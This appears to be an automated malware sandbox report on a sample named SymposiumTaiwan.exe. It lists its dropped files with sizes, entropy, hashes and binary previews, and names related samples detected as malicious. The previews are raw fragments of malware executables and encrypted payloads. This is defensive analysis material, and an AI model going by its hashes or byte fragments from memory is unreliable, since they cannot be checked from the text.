                                            • Filename: main.exe, Detection: malicious, Browse
                                            • Filename: main.exe, Detection: malicious, Browse
                                            • Filename: lSmb6nDsrC.exe, Detection: malicious, Browse
                                            • Filename: giupload.exe, Detection: malicious, Browse
                                            • Filename: SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):526804
                                            Entropy (8bit):7.999622856373698
                                            Encrypted:true
                                            SSDEEP:12288:ET6FiwJ4rnZ/+2zyUtt2Xz6DXlMag5lsQE2j1kpUchVtz1I:8QXWnZnzXtMXzKX+V82NcvfI
                                            MD5:D15A13FE445A1CA38371C5C7C10D3B4B
                                            SHA1:7F7C9E1B1BFE9B5893202AA8A80559FAF3C9858F
                                            SHA-256:66AD1C04EBB970F2494F2F30B45D6A83C2F3A2BB663565899F57BB5422851518
                                            SHA-512:6368E75F4F1A32DB5D802AEC4015A658ECB81A0E0F4A660D1DC569B481BF4C64D1F761453DD6747E27EE44B8C183DDB41C0F5B15AF18B460ABFC4C882C463ABA
                                            Malicious:false
                                            Preview:uy....$.N...r.7.......din.........aO.h.R.".{...I......b...5..C..2Sw._4Q5...b..9_....P7..Es36J..7r...A.|...C........E.........A...?C..vvH....E.kTt}..x.^c?............z.i....xe..v...0y..Q...%1s.4...3#V...Y.*.)..N.........-GC....`...!&`.....q.sT.....C....P?.p@..........d........[(.l.N.k.Y.0..NfNe%..b.7Q.=....w..S.M.L.k"E+3...f\..........p.*...%qo..h.\?...0-..8..Z..2L;........0.[H.H..H....{...o.O........GJ...d..i9..]6.X-.....?....,^O.r..|.T.d.C.z.v&H.PE..@.J.a.;OPoK.u......vV._.?).b......2Wj.}L{...{`.H...bAU.LHh.7..Z.1...*<.o..@/.g..+.y.-..../FU..iAI..Lzd..Z........W@.Zi...:.)aY..H...{B.A.M.[.Q...'.:('.`.6_*..)..Vt.........M.7N.9.s.!/..D.?.$.r....t..)...S..8..c.S..'n..........Z..&.t.M.}[N...4. ..m.w...k...E...YE*..C.e....I2U....d.D{.p...S.7L..3=...w......k8fD.X.C/..l..:...s..y....e...$..b..i...[b..s...<...Y-..:O.f.H.....4.j....j....~aj..U.W...t......X..*.@....l.Y.......... .p...W..L..6...,...<p.Z6.6X......c_.k.R.^x8[E8".4)......M .Y...,..X.so[
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):43008
                                            Entropy (8bit):5.069684566047934
                                            Encrypted:false
                                            SSDEEP:768:4jcd+DvFQC7VkrHpIu9xhSaAwuNbCc/meI:4jcdGQuklIusaAwu9hPI
                                            MD5:0C14CFB8C7613A8EF93E4D2D3FFB5D98
                                            SHA1:EFF8F317DF1EFAB123090285E0827DF759C259CB
                                            SHA-256:C1F8A6A30088526D8AF3E250CD795401550EC8D86538310AA9C97DC5B721CFA9
                                            SHA-512:990C0947247F23B4FA693191BAC66EC2B823FC90542DCE0F92285F2D934A3A89E662A67B95F42E6DD3D398A3099E625D527D323474643F43A9F5E103EB2E6552
                                            Malicious:false
                                            Preview:.-.I.Q...d.e.-.C.H...e.n.-.G.B...e.s.-.M.X...f.r.-.B.E...i.t.-.C.H...n.l.-.B.E...n.n.-.N.O...p.t.-.P.T...s.r.-.S.P.-.L.a.t.n.....s.v.-.F.I...a.z.-.A.Z.-.C.y.r.l.....s.e.-.S.E...m.s.-.B.N...u.z.-.U.Z.-.C.y.r.l.....q.u.z.-.E.C.....a.r.-.E.G...z.h.-.H.K...d.e.-.A.T...e.n.-.A.U...e.s.-.E.S...f.r.-.C.A...s.r.-.S.P.-.C.y.r.l.....s.e.-.F.I...q.u.z.-.P.E.....a.r.-.L.Y...z.h.-.S.G...d.e.-.L.U...e.n.-.C.A...e.s.-.G.T...f.r.-.C.H...h.r.-.B.A...s.m.j.-.N.O.....a.r.-.D.Z...z.h.-.M.O...d.e.-.L.I...e.n.-.N.Z...e.s.-.C.R...f.r.-.L.U...b.s.-.B.A.-.L.a.t.n.....s.m.j.-.S.E.....a.r.-.M.A...e.n.-.I.E...e.s.-.P.A...f.r.-.M.C...s.r.-.B.A.-.L.a.t.n.....s.m.a.-.N.O.....a.r.-.T.N...e.n.-.Z.A...e.s.-.D.O...s.r.-.B.A.-.C.y.r.l.....s.m.a.-.S.E.....a.r.-.O.M...e.n.-.J.M...e.s.-.V.E...s.m.s.-.F.I.....a.r.-.Y.E...e.n.-.C.B...e.s.-.C.O...s.m.n.-.F.I.....a.r.-.S.Y...e.n.-.B.Z...e.s.-.P.E...a.r.-.J.O...e.n.-.T.T...e.s.-.A.R...a.r.-.L.B...e.n.-.Z.W...e.s.-.E.C...a.r.-.K.W...e.n.-.P.H...e.s.-.C.L...a.r.-.A.E...e.s.-.U.Y..
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9216
                                            Entropy (8bit):6.577889563971452
                                            Encrypted:false
                                            SSDEEP:192:Z3i3LuM1gPlf0tcjtWoWnK3YDejLzRbm5zM80yyZxXKn5cWjT0vaLtFI:euM1geStviK3YDejvRb0IyyZxSNBtFI
                                            MD5:C152FC29FDC5D9FD55C4A8F28D9EF774
                                            SHA1:1D210000C98BF58F6A0AD29561C7CEB3C421F99B
                                            SHA-256:5DBE81F978922CB690E0EAC34284D20F76B0EAE329AFE44986959688C7E7E44D
                                            SHA-512:8730C7BAF9B15991988655305951DB85F227317E3DCA67B4A84948CE15FEDE2505B79CDA12B15DCCBCF8960198957ED37971251C6B71691047BEDE90DFCA09FD
                                            Malicious:false
                                            Preview:[..]. .U... SVW...M..}..Q............E..x..u..u...........>3..F.........3.C9X...9....@..M.3..}..}..0.}..6....}..t..M.......M.p..}....]..u.M..E.P.E.P.E.P......u...E...u..R....>.}..^....C....E..F........M../.........E.........E..j._.......E.....p.;.v..u.........&..F..........u=.@.j).8...k.....u(...=.....Ky..u.........F......&.j._.....E..@..M.Sj..u..t...E.P......d.E.3.C...9X.v..u....{....&..^.j..u1.@.j)....E........u..M.......Ny..u....C....^..V.u..E...P.k......M..%....._^[..]...U..U......B..A..B..A..B..A..B..A..B..A.....]...U..E.V..M....E..F..E..F..E..F..E..F..E..F........^]...U..SVW.}.......G..F..G .F ..t..@..G$.F$..t..@..O..V.3.S......O..V.S......O..V.S.....O..V.S.....O..V.S.....O..V.S........._^[]...U..E...3..A..A..A..A..A..A..A..A .A$f.A.....t.........t.........]...U..V..W3.h.....F..F........>J..~.P.~...D.I..M..V,W.:.~0......F4..$....P..l.I._..^]...V........N......N......N......f...N ..t..I.u...j....N$^..t..I.u...j....W.....>J..d....w,..X.I..w0..X.I..w....Y.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):203
                                            Entropy (8bit):4.771023371126463
                                            Encrypted:false
                                            SSDEEP:3:hranivWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8GmbgElKmE/p3PeUwM:hWniFqjvVg3F+X32l/8xb99E/p/L5
                                            MD5:3750ABAFE105DE58D3CC431FB39159A8
                                            SHA1:A3E1CCE867900DA49347D2C8D3615C7806ACD966
                                            SHA-256:E8641D676C6DDF1DCABAF2A6706A849EF66D3C6AC23BEA142B0753531DE986B4
                                            SHA-512:5C36EECEB1E69A8D74AEAB2A2DDB0477B3B2264C4DFF729DBCDEBFD93FF9B668C0522B950E1FD4A96B5A8B9438A46FC11DE67ED2E998B3F753CF8FCC34095EC1
                                            Malicious:false
                                            Preview:cbsinchhavefcc..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):172032
                                            Entropy (8bit):7.9986856820134475
                                            Encrypted:true
                                            SSDEEP:3072:+Hv5SioNVSdEiM5wtttbGZmO73tX9AkW6XYBVxdEWVwB:cDfyMtttSZmOXz6BA
                                            MD5:EF6D6256127644E3458355AAFE4C6B23
                                            SHA1:45003DEB6C119040B14D9267A70074735017F231
                                            SHA-256:6ACD995779DF71D95F2304CF5674F5111543D32A99ADF2B226ADD956BA02D0EE
                                            SHA-512:AFE5341CCB0613F36C5D23628976A788BCA4C40FE0AD94A240155C0A6BB89F35B48E7A42DDD8F0DD2BAD4113871AC4F05AF8018081F623403719C142EA20FB52
                                            Malicious:false
                                            Preview::..*m..C....D.4......._..x+...l.....`.y..a.l.f...)jjC..;.>6+-....}ql.xG.vM/.=....}.b.eZ...G....6..+...b..W.C...p.H.G..,...dNJ..|...+......*..'....}."w...L.....".........Z....r...0......C...ObK.....7.. ........v1..&.`.5.T.<^.%|].[k.%...u.x[7o-....P.9.>.`;.>.?zH9....;.6&....Z..Zl..P...D.u3..xTr...X.....Zy.W.c..H^1S..\\.M...]..Sl....S.6.b..:z..+dJm.k.awnB..+cw.z4......c."#54.%^..4C@..gmd.A!..p.....V......`..N;\.<..&..g..3..k..._...`~N....].c*(..#..<J..".c.60.....2....E.``.N..k.>.@..........doC.....T0J{.C.....X,..?@B]....U...g....S6U.c.c....kEp...Y.\.j'l.].2..x...Juj....Z....:..H.~.....1.f..e.U..5.Q....e0.z...LPt..H.z..M2A......'D.......U|.v.V.t7.O.8..L.=....kL.8..]."X.g.k... .If.d....X.U\tJ.A.a....W...Eg.jt...U.9.......$...2.b8 .......%L.~.|..Ix..;...6.....s:.[.....$.....x.7[.:BP....6m.......TW".#ad1m<.z.G...v{d8..hv..`.'X....."B...r.li..D<.v&.h..ky.*.<>n.|<../5..U.?i...>...pU..OU.........4mb.......c.t:W.L)..jtfj..;uf.....,^.O.9!..|#.a&1...
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:MPEG ADTS, AAC, v4 LTP, stereo + center
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):3.7989783175837877
                                            Encrypted:false
                                            SSDEEP:96:LSSYpXd+CuMjUHskaEN/bs5Or/tCoq8WFFFX4iBEEQiIfORbtb:2vpN+CVjU9Nj8OtCRlqMlp
                                            MD5:E6BDCE0D05A909096B386816F3CFA1D5
                                            SHA1:CFAA808E69A83141355C53B64A9E24AB411D4145
                                            SHA-256:0B6D88675181405A96A08385458DFAD98CCBB1B09673171C2CE8C5152BC6DBF7
                                            SHA-512:9B4FFE33A33E64F9E7A74B710479A6E17C45C2EA22CC071B7D2E1741E29947DBC0250A315A9A64A76B9E7798F229C17313CF31F59429053DDC65CB24F2D5736C
                                            Malicious:false
                                            Preview:............................k......................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^........................k.................................]...]...e...o...o...o...o...o...n...]...]...i...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...h...]...].......................................................b...]...]...p..............................].......................................................................................]...]...a............................W.....................]...]...]...]..............................q...].............................................................................]...]...]...].......................W.........................]...]...]...]...]..............................`...`.......................................................................d...]...]...]...]..........................................
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):43008
                                            Entropy (8bit):7.995588404005775
                                            Encrypted:true
                                            SSDEEP:768:PnsfqWELPj+lQDora32WiA+RwYdOb96EUxNwgZxOBFD1wFmyp:PsfcjIQDora36ZZdzEUxiGOBF+Ftp
                                            MD5:680D98E0BD235C7540F04E312054B618
                                            SHA1:54A5683C47499198628E5CE8F7846D2BD9A35003
                                            SHA-256:953516F9EB6DD9BEC518B19D10FD6F0032E25375CF42B33E55D31EFB7B2510B4
                                            SHA-512:FAE2F8FB89F01888D74FD4F5A165CDC438A14FCACB7976976F25BC10F27E80C3E8E7CAD561AFB5FC017245B9A9378059714A6732AB83A0C113D46481D196C0FF
                                            Malicious:false
                                            Preview: X...Yiz.!"...E..m.......Gs.3..b......5Ap.a...C3.....C2g\.Xo..m..ur0.h.\...x@.4.GT~....jq....u.....e.....(~7.8c.....:....[. .c..w...u..-d...4'.:...uj..<...m.\.y4_.x;...?..G....c\....h.....H82Z..9...Z....N..p..iM..c.2....+1.(..u..&......u.,..\L..y.{H....7.c..#.p.$u\..M.0".A.)E..o$Y/ki.m.-..=D..SbV)u.....6.T.I=.x.c.G....1.W...Uwn.z.:8....^..4p;./.w..((.tW.....A.../....2..\.../.....>x..\.....)../.Lb....$P.f..?F*k..|........%.y...0m.E.....Z.R.C..M..P.v\.b.glF.}8l.....6.Y.....1.w_.."k."P.&....K..Z.......9...j:.,..4.....7.!.../.........|.f;.H....1.........t.. ...,..H%G......C3..~!^E..>.7D..5...G..vh..[..U?..09O.-..Q.UL..."......t...3z...N...i(..~....4....+.c~.Wb.........i..uY:....in.%.....1...%O..........:.DCU.L.Q...Ll7...[...x...EBYl.;..i..4..l3.5..`PF2=U...../e....=.FC.zZ._L...(dl...$9zE.A.O.....z..]...&a.^[h.6.#.Ax.T.'q..j.v......mc....v....'..O=....Y.H.P^..,.9J.Q.a+..p.../c`....D.4...g...i..3i........t..5#.u`M.......yl.d.h.A..+......*..&...5....$.\
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14804
                                            Entropy (8bit):7.986959130379449
                                            Encrypted:false
                                            SSDEEP:384:xACP2w64kyxcbohtcCyTRDw9L+/jdoYNaUMQI7G6:Ni4kyxc0htcX5w9LgRh6
                                            MD5:91669D2811EC08C6666F7B1706DF64E8
                                            SHA1:FBF5EF83DF24F56C6B7C1860A86F0438AE80FF21
                                            SHA-256:EF93BDD79B869699569321C1D9BC35E3B3A460A8403C8BD071B3274F964E00CA
                                            SHA-512:8B909EB7C28B3ADCDFF603A3E693785A7692B14C8214C3BF17EA86548E8442508C7B50749181B0277398BBD91BA2A06F34A21CA9BD8E8497CFB1D925691051FB
                                            Malicious:false
                                            Preview:.x.+M....-DA.}.V.......p...)red.?..h..zL.D...`..kL....q..4..|....=jU.C.SG_...I....x.}./[c..3#.[B!g.2.......Wb.u#"BD.jh.Iz..+Dwp.....].$)N"S..$._..Q.....m.e^...5\x....vZ.....o.8&.8.-@#...U.... s...D....I..y.pw..[..Iv&.$0tG._C.'..K..V..w...oG.....E...+..>......M&.Er.^. ./1.z. .Y....P......?:9.M..rk..tA,....E..@.......7..h.$.l..SUV.qm.&I..u...g...7..7..F.....u.{@ X...B.P.....F}.Z(....z..I...8..^...!c..A....l.4..6u.....d...'..2._.&8.Y...)...X5x.G!....4..R....o<..Y(..P(..K9~..1.C.PH..P.._.........W....b.....c..)...4..R..)<!.+...=.....`*.....F.O...g.1..N.:.\Z.`.M......I..-.....U.W...mp_.V..2...).{.....{...!.4..#.j...M).R........;2$........c.k.....)._..%...?...j.....kV2Q..t....fK.f......9G...<.`f..E.o............(...S......t.2K..B.9!7= .}m.....%.._ .G.....$..........b[k..Of..y.x.(...Q.....P.J..Qf.._np=..q.hqz..>aG.....[..2.....e=....T...g..O4/...].....9..g...U....,ZJR.p..>8....px-\}..=.../.7........ ..,U-[b....U.{......5....-...V.....& ...
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):35840
                                            Entropy (8bit):6.646434855328532
                                            Encrypted:false
                                            SSDEEP:768:tcrjQAVlvZEx2zinQD2tR/i01A/ES4KY2lfwMwstd7t+Jb:tRIs2ziQD2tR/i0027Ee
                                            MD5:5A3D16FD1534FE809AE023B2C2B4A6B5
                                            SHA1:CAC3FB5788D47C619E4B338791F50EA16841BA2F
                                            SHA-256:217CCAE25B5995B64C31371C24936E42480B53430D173A5A2B4D7E462E446CBE
                                            SHA-512:6F9388C4413BAE05411E0B5FED3BF4544FFFC9DC6CD4B6F0C3A5F481C363E11A73E37A4397459999544334FEF7E8C5DD49176A1F6CC9E1EC258D770216D8F5C1
                                            Malicious:false
                                            Preview:..D...D...D...D...D..............$..B....B...B...B. .B..D$.^_..F..G..D$.^_.I..F..G..F..G..D$.^_..F..G..F..G..F..G..D$.^_..$....W...................te..$.....f.o.f.oN.f.oV f.o^0f...f..O.f..W f.._0f.of@f.onPf.ov`f.o~pf..g@f..oPf..w`f...p............Ju...tO.......t.......f.o.f....v....Ju...t*.....t......v....Iu....t.....FGIu.......X^_..$.............+.+.Q.....t.....FGIu....t......v....Hu.Y.....U..U.. .L...M.#.#M.... .L.]... ....t.j...!..Y.. .L..t!j.../....t.j.Y.)j.h...@j.........j......U..E...QL.].U..E....>I....A....A..]...U..V.u...f.....>I..F.........^]......>I.....U..VW.}...;.t.........t..w....5......G..F._..^]...U..V.....>I..R....E..t.V.....Y..^]...U..}..S..t-W.u.......x.W.....C.YY..t..u.WP.M.......C.._[]...V..~..t..v.....Y.f...F..^.A...u...>I..U... VWj.Y..>I..}..u..}...t....t......Q...p..P .}..u...t....t..E..@...E.P.u..u..u...@.I._^..]...Q.. ?I..g...Y.U..V........E..t.V.....Y..^]...U..%.QL.....S3.C..$.L.j..!-......L...3...QL.3...V.5$.L.W.}......_..O.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):39405
                                            Entropy (8bit):7.044447813547874
                                            Encrypted:false
                                            SSDEEP:768:JSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:JBVgCOa1ZBPaPQaEwo0yv
                                            MD5:8713BF8C2E1926D8B6033B58CBE61387
                                            SHA1:EE33F1CBD6534373FE5E74D8BE7A37CB0173B3AF
                                            SHA-256:25C1AD9FFA7963C095C230BB14EBEDE0216C9229BD88B8889EA8855D1D7A4F6F
                                            SHA-512:8ABBC0299D541A15C671B142AC844CDBD74F3CBD533A0338C7D2B75B3FDF3B67C32F02D605A4C7150A3A8E314129DC51DE95646C1B087B7763D697FCD38FC308
                                            Malicious:false
                                            Preview:..... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee...............................................................................................................................................................................................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................\.......V....[..%........\..k............Wz......e.......kM........:....[.........P..\.......0..........................................?...?...........................................(.....................L.........._.....A.u.t.o.I.t.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):29696
                                            Entropy (8bit):7.993887392525512
                                            Encrypted:true
                                            SSDEEP:768:bdGTFTi8QEUEBvpVTfpOghV40WC3yS7P4fdmgOmqzo:b6FTiAjBvpVtzVzyS7Qhqzo
                                            MD5:AF934A1EAAB0DC191E39CF07AE8B275F
                                            SHA1:8DDDA338140F740809EB25C8D24F81F1EC7CEF81
                                            SHA-256:F956E234ED66A2AF4A2111A9C33428FA4DE75E898EDD11A242DD9E6709D9E5EB
                                            SHA-512:8D174DD6164549829FBC254F8F6D4A1EED1935AEBBACFC5394B972B39CADDB794C4BBDA4606EC37B2DA6572774CE2479F0B581FE04EEB9EA8A45402501722F01
                                            Malicious:false
                                            Preview:"...Y...yD..>7&.......UE......&7J&o.....H..V.+....;r.2hCL...V...qb_.+j.%.(.<.8+.....@..A....dM.......L[$@_..zD|.....L.=Bg.B..}..a...c.......m...N_...,...r.\.3......./...0.....w|X.....&.w.}..%.k.P=.V..L|....h.....O..EkO88.J..y<aj.....Jj.....[...4..'.)|...|(..iU..../@..W..P;.~.t>....F..1.<.o.. .`...F...'@y..#h*a...~...?$.....d...N..~Z.....$.............(..!gv.YT.-...!Pq..JU......!..T.Lw.~,........&..(7j.[2@.t....\K..5.].0......+..Q.<...`[z......)...h|y.......`.`4;.........,[09.4..K.J.z.}.....[a...........dAt...!..t..}....l.=...DZ..Z.RD...V...Z=.R0+.z....H..E..K.._.....$..X....Sp.....Q..[.I(...t.}...C>...@.....1.1.J.....-5...9..~K.:}#.&X.n..S.B.h2.2.Y.(......'.9`.............us.......^,.LpV...0D.....b..`|)}$+~n..a.1.......u^..p.{..M2._(.G/..r.L._y.....L.....G.XY...}...].....2........!z.f.e.(...A...f...;..+,r..L*....T5a.....Pg..7T........s#.T...R.L..f........-..t...de.1.....U..#B...u/..R......u.RJ....Pp.NC.'*mb..h=zB..7'...h.cY:}rs..h7%4~..i.|
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):6.4980936928564885
                                            Encrypted:false
                                            SSDEEP:1536:0UshVkf88nfNk4qqdGYynTDYL7Q+mr9R2VgjGi:0zAfaBaGdDqeb2Xi
                                            MD5:A11FCA307BB7C930C87C6CAB295340BD
                                            SHA1:F4E7B212D8B8A0B1C8FB518B1AFE91AE35F96786
                                            SHA-256:3D6207058F9AB3C3226C12FD37002064729BD043575325CE343CA1D225F2033D
                                            SHA-512:CCDCF1BEA0BAC86DE0D2C5FD2C1482F7B50105DEDAEBDCEB3F2E4A91C9D36161D9DA35085BB4315A596873AAD55459194756A008800E7A585E23EE520E3A5937
                                            Malicious:false
                                            Preview:._..^.SV..3.9^.u..F$h..I.P.....F.YY..u.j.X......^.9^.u,..,...h..K.P.w....F YY..u.9^.t..v.....Yj...^ .F..^.P..^...8.....<.....@.....H.....L.....D.....\.....`..........t!9^.t..v..R...Y9^ t..v .D...Y3.@.[W...........t 9^.t..v..#...Y9^ t..v .....Y...,...)..........9^.t..v......Y9^ t..v .....Y3._^[.U..QQSVW..._..].....j...........u*j.......8.....4..............8.....<....[j...............8...+.M...t<...8...H..4..........E...%....C........8.....<....E...u.]....6......b.....D....u.9.8.....H......6...3._^[..].j.X..V..4.....t.P...Y..X.....t.P...Y..T...^..t.P...Y...L.V..W=....v3.%..L....P.....t(.N.3.k.d.v.PQ.v.......u..D......@...L._^.U..QQV..~..u..F..F.j.P.E.P..}........v..E.j.j.P.........M...E..F........E....E........E......E.h..K....E.P.......YY....^..]...W........@...um;.8...smV..@.....4..........O..........G...@.....@...;.8...r.^.5..@.....4...............P.i.....@.....@....G.;.8...r..<...._.V........`.....t.;.u..v.Qj...X............`......`.....X......A..`...^.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):53248
                                            Entropy (8bit):7.996441588273336
                                            Encrypted:true
                                            SSDEEP:1536:DElUveRp/TT3pTcz4lMFGf3hjigKXwIhj2jm:4iWj3KElMFQxgXwWj6m
                                            MD5:82F500A3E4543C57731F4C469F7EA564
                                            SHA1:F453F57B850539B619E354492DAC78A6C6DB37C2
                                            SHA-256:62563C7ECE10E9C7C7C2F653FCA6F3B1AC5D1964231D7C36180986A61063821C
                                            SHA-512:5FF7161F530082D371974016AB8CABE31155BE1CEA341D509DD30A8686C1CD568A901B33B7010BB84D0C878586159C61C39FE45DF43C33B4586447E3DF33CA66
                                            Malicious:false
                                            Preview:..*.)k.~..h.Cq..pu.Pt.4....(.....U9P.e4...V/.......V..O..kt.q..=.LZL.aYT.....iP|.r"%,.....u\j1<.......G...].K....!=.2.J.|...r......p..>.i./=Y....F..5.N8GEF%[R...Z....~>.v..\0...=....!....E.)..C..J!5#(.../..{..m=....r..N*....Oa."ss...=..C*.....^..(oeV.jY.....Rl^..'|.g.W:.G. ..5 .ev.P.........28.7mC........{......>.....[5....'......|..H......}.,..(.#:n......+......;p....l}M...2b..Y..C.B%...AF...x...^XcDz..l...a..........3-..7...a"s.8$7....a.."..1.r..r..b.../.^{B......S...l.....|...j.^1..T..AF.v;za4..j..A...{.....R.... .z..........P.!.&.x.....y.{......AZ..-.."...K.6...W(SC..;z..s..1B.........k.f..+ ><-K"..\.R.Xm .....8NF.oYE.+....4.."X.Q.....^..d...`...P....L.....\.y.6..w.Q.?..&..v=...\.........."..m....8....._W....%......}N...I.h.<..r^j<Q.....X. ..6..........c.....d..g.t.U...('r.F2V..\.......).).M.g..../r.%0..mb.;...I6(.,[R..%I.Xp1kC4..f.r..........)g...5.]N..} y....!...t.x.3..\L..e.2Q(......{....Wo..+...}H..{.8...s.X.......h.%..u.D8.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):48128
                                            Entropy (8bit):6.800155406936958
                                            Encrypted:false
                                            SSDEEP:768:D/awuUw1Q37iehoxQeU3ecejLixwghYEYP3iSRWG7iksc7nj6evkC:D/awuUwU7KxQefixl2vqWWGlHHvV
                                            MD5:AA8484D81EF1B3776A3DEEC13F67BF50
                                            SHA1:14DC05FAFAAED35729365C0EB55AFCBE9B8CD61D
                                            SHA-256:B26F2264E5D55A9DE7992F9120F8B6046D62AE1276BEC4321B4B6034824C0594
                                            SHA-512:B54669BEA8729116259BAF26BDF5F5F2DA9EA7EE45EA68A18BA2430DA1701B6463EDF7D572D151B180BC31D9B323828404BD565F9577FE30471E067A660457A6
                                            Malicious:false
                                            Preview:....O.......0...;..aL...$................M.]....YL..D................v...|...8.G|.............................9}.u...{..!8..D.$.....E....Ht.Hu......t....E..E..d.....t.....s.j.^V..x...E.Y..u...{.........{.........v...j.j.j..u..G....M.......YL..D.(.E..T.,.M....YL..M.E..D..H.......T.....t|..tx..3..P.G....YL.N.}...U..D...tZ....YL..D.%<.tK..tG..B....YL.N.}..j..U._.D.%.u+....YL..D.&<.t...t.j...B....YL.N_j.Y.U.L.&.u..1L.....E.Ytq....YL..D...tc.E.P.4.....I..E...tL.}..uFj..E...P.E.V.u....YL..4.....I...u...<.I.P.nz..Y....E......E....M..8.E....YL..M.j.QV.u..4.....I..........M........;........U....4..YL..D......W....}....m.....t..M..9.u.....$..D...E....E...8.M.;.......j.Y....<.......:.t...FG.....E.H;.s..G..8.u.j.X.............F.xj..E.GPj..E.P....YL..4.....I...u...<.I...u|.}..tv.U....YL..D..Ht#j.Xj.8E.u...F.&...F....YL..E..D....;u.u.j.X8E.u...Fj.Y;}...D....Kj.j.j..u......U...j.X8E.t.j.Y..F..U.j.Y..F.....YL..D...@u....D........F.E...+..}................N....x.F.......3.B...
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):6.672917202110231
                                            Encrypted:false
                                            SSDEEP:768:Spx5cpiU7GEXc7/ZKhhjYn6JPuaY4vDcverIEG0JRR/QN+eoQvGkwLb:05yiPl/UQ6JP04vDcmrIEVJRa5oQyb
                                            MD5:0D65F03F34051BB360314EC14EC3622D
                                            SHA1:F19B01E3216CD681CBC163A86F0ECD09B6616124
                                            SHA-256:1ED99FA136DC8F167AC6475067DCCD9155420C1600C28B5E1AF6F9791A9008CD
                                            SHA-512:0B4D85B81DEC70CDA9AF9E5D122FB4E140CB15E18F0ABA9E993802F2E1D43F23632501AD01BD3E51C05329C0886A093332A8C7A2307DE3999DF545AFFEF2D7A0
                                            Malicious:false
                                            Preview:D.I.P....I..M......F.@t..E.+E.+E.+.......M..F...}.t..E.+.+E.+....j.W.u.SQ.vT....I..E.P.vT..4.I..M.......E.+E....+E..E.Pj.j..vT....I....^......z".F....[J.j.....Ph.....vT....I..FX_3.^@[..].U.......V..h.....vT....I...tah..........QP..l.I..F..t.f.......u.j.....I..4...^......z.h.....vT....I.......P.N4.1J..j..vT....I.^..].U....VW3...}........Sj..vT....I..E...ti.M.QP....I..}..M.;.~......}..M..].U.;.~.....].U.+.+.}.j.RQ+....Wj.X+..+..E.j.[.......Q.u.....I.j..vT....I..E...t_.M.QP....I..]..M.;.~.....]..M..U..E.;.~..U..E.U.+.+.j.RQ.A..+..kE..Wj.[.....+.P.u.....I.h.....vT....I....tN.E.PS....I..M..E.;.~..E..M..U.M.;.~.....U.M.j.X+.+.j....E.Q...PWj.S....I.h.....vT....I.[..t.j..O.Q.M....Qj.j.P....I.j.j..vT..X.I._^..]...U..}.....V..u.h..I..N4.`H..j..vT....I.^]...U..=..L..u.3.]...].....U..Q.E.....L....ti...tQ-....t5Ht.HHu..u........a.E....Ht.Ht.3..T...I....H...B....?.zT.u..E..BT...H....-.E..@......@.r......M......P.....P.u.....3.@..]...U....SV..E.W3.P....K..N..F...
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):52224
                                            Entropy (8bit):5.875244608871072
                                            Encrypted:false
                                            SSDEEP:768:/SCursGHv7mlHW7nIhp/lNVi6dFiwc/RGNul1Eovu86eV3QKYwlrRX9Qywqp9sK0:/S3hPt8gNpkU5uG3xYwBMK1zC
                                            MD5:0C32080BC0AD79D95C7A56ACEDFF6F11
                                            SHA1:F5A682D86718C50F0C876F8B377F7B750469E5D9
                                            SHA-256:2EBC9B817367488C904F1CA4A291F295D45EA25D83E51AA8E7C30BB5A27001DF
